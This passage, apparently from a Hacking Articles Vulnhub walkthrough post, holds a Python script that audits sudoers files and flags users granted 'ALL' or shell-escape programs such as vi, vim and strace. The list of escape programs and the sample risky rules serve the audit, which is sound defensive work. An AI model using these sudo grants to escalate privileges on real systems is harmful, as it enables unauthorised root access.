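# Only the programs abused in the two walkthroughs above; extend as needed.
SHELL_ESCAPE_PROGRAMS = {"vi", "vim", "strace"}

# Constructed sample sudoers content (not taken from the VM).
SAMPLE_SUDOERS = """# User privilege specification
root    ALL=(ALL:ALL) ALL
user8   ALL=(ALL) NOPASSWD: /usr/bin/vi
jack    ALL=(root) /usr/bin/strace
user3   ALL=(ALL) /usr/bin/apt-get update
%admin  ALL=(ALL) ALL
"""

# who  host=(runas) [TAG:] cmd, cmd ...   (Defaults lines are skipped)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")


def parse_sudoers(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (who, runas, [commands]) for each user-specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line or line.startswith("Defaults"):
            continue
        match = RULE_RE.match(line)
        if not match:
            continue  # aliases and other syntax are out of scope here
        runas = match.group("runas") or "root"
        cmds = [TAG_RE.sub("", c.strip()) for c in match.group("cmds").split(",")]
        rules.append((match.group("who"), runas, cmds))
    return rules


def risky_rules(text: str) -> List[Tuple[str, str]]:
    """(who, command) pairs for non-root principals that get a shell-escape
    program or an unrestricted ALL; full-root rules are reported because they
    are at least as powerful as the specific ones."""
    findings = []
    for who, _runas, cmds in parse_sudoers(text):
        if who == "root":
            continue
        for cmd in cmds:
            if cmd == "ALL":
                findings.append((who, cmd))
                continue
            program = os.path.basename(cmd.split()[0])
            if program in SHELL_ESCAPE_PROGRAMS:
                findings.append((who, cmd))
    return findings


if __name__ == "__main__":
    for who, cmd in risky_rules(SAMPLE_SUDOERS):
        print(f"review: {who} may run {cmd} via sudo")
```

Feed it the output of `sudo cat /etc/sudoers` and the files under `/etc/sudoers.d/`; a rule such as `user8 ALL=(ALL) NOPASSWD: /usr/bin/vi` is reported, while `user3`'s apt-get rule is not, because only the basename of the granted program is compared against the set.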

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post PumpkinRaising : Vulnhub Walkthrough appeared first on Hacking Articles.
